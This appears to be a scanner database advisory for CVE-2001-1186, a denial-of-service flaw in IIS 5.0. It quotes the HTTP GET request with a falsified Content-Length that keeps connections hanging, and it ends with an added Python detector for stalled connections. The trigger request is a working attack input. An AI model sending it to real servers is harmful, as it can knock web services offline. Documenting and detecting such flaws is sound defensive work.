| VID |
12011 |
| Severity |
20 |
| Port |
80, ... |
| Protocol |
TCP |
| Class |
WWW |
| Detailed Description |
The IIS 5.0 server is vulnerable to a Denial of Service attack via an HTTP request with a false Content-Length value.
If a remote attacker sends the IIS web server the following HTTP GET header, containing a falsified Content-Length value that is larger than the size of the request,

    GET /testfile HTTP/1.1
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    Host: 192.168.0.10
    Connection: Keep-Alive
    Content-Length: 5300643
    Authorization: Basic

the IIS web server keeps the connection open and does not time out, but does not otherwise respond. As the number of such open connections increases, the server stops serving new connection requests. It is possible that this causes a denial of service to the web server.
* References:
  http://www.iss.net/security_center/static/7691.php
  http://online.securityfocus.com/bid/3667
* Platforms Affected: Microsoft IIS 5.0
  - Windows 2000 Advanced Server
  - Windows 2000 Advanced Server SP1/SP2
  - Windows 2000 Datacenter Server SP1/SP2
  - Windows 2000 Professional
  - Windows 2000 Professional SP1/SP2
  - Windows 2000 Server
  - Windows 2000 Server SP1/SP2 |
| Recommendation |
No remedy available as of December 2002. |
| Related URL |
CVE-2001-1186 (CVE) |
| Related URL |
(SecurityFocus) |
| Related URL |
(ISS) |
|
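A defender-side check for the condition in the Detailed Description, as an added example that is not part of the original advisory: it flags buffered requests whose declared Content-Length exceeds the body bytes received on a connection that has gone idle, and lists clients holding several such connections. The function names, the 30-second idle limit, the per-client threshold and the 203.0.113.x client addresses are assumptions made for illustration.

```python
from collections import Counter

def declared_vs_received(raw: bytes):
    """Return (method, declared Content-Length, body bytes received) for one
    request as buffered so far; declared is None if absent or not a number."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method = lines[0].split(b" ", 1)[0].decode("ascii", "replace")
    declared = None
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            v = value.strip()
            declared = int(v) if v.isdigit() else None
    return method, declared, len(body) if sep else 0

def stalled(raw: bytes, idle_seconds: float, idle_limit: float = 30.0) -> bool:
    """True when the headers are complete, the client promised more body than
    it has sent, and the connection has been silent longer than idle_limit."""
    if b"\r\n\r\n" not in raw:
        return False
    _, declared, received = declared_vs_received(raw)
    return declared is not None and received < declared and idle_seconds > idle_limit

def sources_over_threshold(connections, max_stalled: int = 3):
    """connections: iterable of (client_ip, raw_bytes, idle_seconds).
    Returns client IPs holding more than max_stalled stalled connections."""
    counts = Counter(ip for ip, raw, idle in connections if stalled(raw, idle))
    return sorted(ip for ip, n in counts.items() if n > max_stalled)

# Constructed sample input: headers modelled on the request quoted in the
# advisory (no body follows), plus a well-formed request for comparison.
SAMPLE_STALLED = (b"GET /testfile HTTP/1.1\r\nHost: 192.168.0.10\r\n"
                  b"Connection: Keep-Alive\r\nContent-Length: 5300643\r\n\r\n")
SAMPLE_OK = (b"POST /form HTTP/1.1\r\nHost: 192.168.0.10\r\n"
             b"Content-Length: 5\r\n\r\nhello")

if __name__ == "__main__":
    # Constructed connection table: (client address, buffered bytes, idle seconds)
    conns = [("203.0.113.7", SAMPLE_STALLED, 120.0)] * 4
    conns.append(("203.0.113.9", SAMPLE_OK, 120.0))
    print(sources_over_threshold(conns))
```

The same comparison can run in a reverse proxy or connection monitor in front of the server, where stalled connections can be closed before they accumulate.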